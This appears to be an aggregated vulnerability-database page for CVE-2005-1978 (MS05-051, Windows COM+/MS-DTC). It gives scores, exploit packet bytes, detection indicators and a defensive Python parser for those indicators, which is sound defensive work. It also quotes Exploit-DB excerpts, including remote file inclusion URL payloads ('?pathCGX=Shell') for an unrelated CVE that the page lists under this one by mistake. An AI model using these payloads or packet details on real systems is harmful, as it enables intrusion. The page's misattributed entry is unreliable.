CVE-2005-1978
Published: 2005-10-12
CVE-2005-1978: COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code.
Priority: P3 (50), high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public (see the Exploit-DB entries below)
EPSS: 56.86% (98.9th percentile)
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCs (extracted from sources)
Bytes (peer0_0, DCERPC bind):
05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 d0 16 d0 16 00 00 00 00 01 00 00 00 00 00 01 00 e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
Bytes (peer0_1, DCERPC request, first 40 bytes of a 1324-byte fragment):
05 00 00 83 10 00 00 00 2c 05 00 00 01 00 00 00 04 05 00 00 00 00 07 00 e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da
- The exploit targets the MS-DTC (Distributed Transaction Coordinator) RPC interface. The DCERPC bind packet (peer0_0) carries the abstract-syntax UUID e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da on the wire (906b0ce0-c70b-1067-b317-00dd010662da in canonical form, interface version 1.0, with the standard NDR transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860). Monitor for DCERPC BIND requests to this UUID over TCP.
- The exploit payload (peer0_1) uses a large sled of 0xCC bytes (INT3 breakpoint opcodes) interleaved with 0x00 bytes as a heap spray / sled. Large blocks of alternating CC 00 pairs in DCERPC request stubs to this interface are a strong indicator of this exploit.
- The exploit author notes the target return/jump address used is 0x684191c4, chosen because the preferred pointer write to 0x7ffdf020 is not feasible. In crash dumps or debugger output from MSDTC/COM+ processes, look for EIP or memory accesses near 0x684191c4.
- The DCERPC request packet (peer0_1) is PDU type 0x00 (request) at offset 2 with packet flags 0x83 at offset 3 (first fragment, last fragment, object UUID present), a fragment length of 0x052c (1324 bytes), an allocation hint of 0x0504 (1284 bytes, the whole stub in one fragment), context id 0 and opnum 7, followed by the MS-DTC interface UUID as the object UUID. Monitor for oversized single-fragment request PDUs to this interface with these characteristics.
- The exploit is described as unreliable: only 5 of the 10+ tested boxes were successfully exploited ("owned"), and the author expects the real-world success rate to be even lower. Detection based on the payload pattern is therefore more reliable than expecting consistent exploitation outcomes.
- The exploit is marked as a POC by its author and may not represent the most effective exploitation technique for CVE-2005-1978/MS05-051. More reliable variants may exist with different payload structures.
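The following is an added example, not code from this page or from the exploit author: a small parser for the two DCERPC PDUs quoted above that extracts the interface UUID from the bind, the flags, opnum, allocation hint and stub length from the request, and turns the indicators listed above into checks. The two byte strings are copied from the page; the 1024-byte stub threshold, the 64-pair sled threshold and the constructed request body used to exercise the sled check (the page shows only the first 40 bytes of the request) are this example's own assumptions.

```python
"""Parse the DCERPC PDUs quoted above and flag MS-DTC exploit indicators.

Added example, not the page's or the exploit author's code. Header layout
follows the connection-oriented DCE RPC PDU format (MS-RPCE). Thresholds and
the filled-in request body are assumptions of this example.
"""
import struct
import uuid

# Interface UUID carried in the bind packet above (e0 0c 6b 90 ... on the wire).
MSDTC_IFACE = uuid.UUID("906b0ce0-c70b-1067-b317-00dd010662da")
# Transfer syntax negotiated in the same bind packet (NDR).
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")

PTYPE_REQUEST, PTYPE_BIND = 0x00, 0x0B
PFC_FIRST_FRAG, PFC_LAST_FRAG, PFC_OBJECT_UUID = 0x01, 0x02, 0x80
STUB_ALERT_BYTES = 1024   # assumed: what counts as an "oversized" stub here
SLED_ALERT_PAIRS = 64     # assumed: minimum run of CC 00 pairs worth alerting on

# Copied from the Detection & IOCs bytes on this page.
BIND_PDU = bytes.fromhex(
    "05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 d0 16 d0 16 00 00 00 00"
    "01 00 00 00 00 00 01 00 e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da"
    "01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00")
REQUEST_HEAD = bytes.fromhex(
    "05 00 00 83 10 00 00 00 2c 05 00 00 01 00 00 00 04 05 00 00 00 00 07 00"
    "e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da")
# Constructed: the 40-byte head padded to its frag_len (1324) with a CC 00 sled,
# standing in for the stub bytes the page does not show.
FULL_REQUEST = REQUEST_HEAD + b"\xcc\x00" * 642


def _wire_uuid(b):
    # The first three UUID fields are little-endian on the wire.
    return uuid.UUID(bytes_le=bytes(b))


def parse_pdu(data):
    """Parse the 16-byte common header plus a bind or request body.

    Only the bytes needed are read, so a truncated capture such as the 40-byte
    request head parses; stub_len is derived from frag_len, not from len(data).
    """
    if len(data) < 16 or data[0] != 5:
        raise ValueError("not a DCERPC v5 PDU")
    ptype, flags = data[2], data[3]
    endian = "<" if (data[4] & 0xF0) == 0x10 else ">"  # drep: integer byte order
    frag_len, auth_len, call_id = struct.unpack(endian + "HHI", data[8:16])
    pdu = {"ptype": ptype, "flags": flags, "frag_len": frag_len,
           "auth_len": auth_len, "call_id": call_id}
    if ptype == PTYPE_BIND:
        max_xmit, max_recv, assoc, n_ctx = struct.unpack(endian + "HHIB", data[16:25])
        off, contexts = 28, []  # the n_ctx byte is padded to a 4-byte boundary
        for _ in range(n_ctx):
            ctx_id, n_trans = struct.unpack(endian + "HB", data[off:off + 3])
            off += 4
            abstract = _wire_uuid(data[off:off + 16])
            off += 20  # UUID + 4-byte interface version
            transfer = [_wire_uuid(data[off + 20 * i:off + 20 * i + 16])
                        for i in range(n_trans)]
            off += 20 * n_trans
            contexts.append({"ctx_id": ctx_id, "abstract": abstract, "transfer": transfer})
        pdu.update(max_xmit=max_xmit, max_recv=max_recv, assoc_group=assoc,
                   contexts=contexts)
    elif ptype == PTYPE_REQUEST:
        alloc_hint, ctx_id, opnum = struct.unpack(endian + "IHH", data[16:24])
        off, obj = 24, None
        if flags & PFC_OBJECT_UUID:  # 0x83 on the page: first|last frag + object UUID
            obj = _wire_uuid(data[off:off + 16])
            off += 16
        pdu.update(alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum, object=obj,
                   stub_offset=off, stub_len=frag_len - off - auth_len)
    return pdu


def longest_cc00_run(stub):
    """Length, in pairs, of the longest run of alternating CC 00 bytes."""
    best = i = 0
    while i + 1 < len(stub):
        n = 0
        while i + 1 < len(stub) and stub[i] == 0xCC and stub[i + 1] == 0x00:
            n, i = n + 1, i + 2
        best = max(best, n)
        if n == 0:
            i += 1
    return best


def findings(data):
    """Indicator names matched by one PDU, in the order they are checked."""
    pdu, out = parse_pdu(data), []
    if pdu["ptype"] == PTYPE_BIND:
        if any(c["abstract"] == MSDTC_IFACE for c in pdu["contexts"]):
            out.append("bind:msdtc-interface")
    elif pdu["ptype"] == PTYPE_REQUEST:
        if pdu["object"] == MSDTC_IFACE:
            out.append("request:msdtc-object-uuid")
        if pdu["stub_len"] >= STUB_ALERT_BYTES:
            out.append("request:oversized-stub")
        stub = data[pdu["stub_offset"]:pdu["stub_offset"] + pdu["stub_len"]]
        if longest_cc00_run(stub) >= SLED_ALERT_PAIRS:
            out.append("request:cc00-sled")
    return out


if __name__ == "__main__":
    for name, pdu in (("bind", BIND_PDU), ("request head", REQUEST_HEAD),
                      ("request with constructed body", FULL_REQUEST)):
        print(name, parse_pdu(pdu), findings(pdu))
```

On the page's own bytes the bind resolves to the MS-DTC interface and the request head yields flags 0x83, opnum 7, frag_len 1324 and a 1284-byte stub that equals the allocation hint; the sled check only fires on the constructed body, since the real stub bytes are not on the page. In a sensor, apply the same checks per fragment and reassemble multi-fragment requests before measuring the sled, because the first|last flag combination seen here is not guaranteed in other variants.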
No detection rules found.
Exploit-DB
CGX 20050314 - 'pathCGX' Remote File Inclusion (CVE-2007-2611) · exploitdb · 2007-05-08
---
# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerabilities
# D.Script: http://codigolivre.org.br/frs/?group_id=413&release_id=1978
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/
# Greetz To: Tryag-Team ...$$
# milw0rm.com [2007-05-08]
Exploit-DB
Microsoft Windows - DTC Remote (MS05-051) (2) (CVE-2005-2119) · exploitdb · 2005-12-01
---
/*
Hard to exploit, isn't it? I have tested it on 10+ boxes, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (merde), so I choose 0x684191c4.
The following program is mostly like a DoS. 10+ black boxes were tested, only 5 were owned,
and I think the success rate should be much lower in real circumstances.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered,
so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire (I am single).
Greetz:
All SST guys, I love your bald heads that never hatted.
Shuo Yang
No writeups or analysis indexed.
References
http://secunia.com/advisories/17161
http://secunia.com/advisories/17172
http://secunia.com/advisories/17223
http://secunia.com/advisories/17509
http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdf
http://www.kb.cert.org/vuls/id/950516
http://www.securityfocus.com/bid/15057
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-051
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1261
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1269
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1466
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1499
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A576
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A816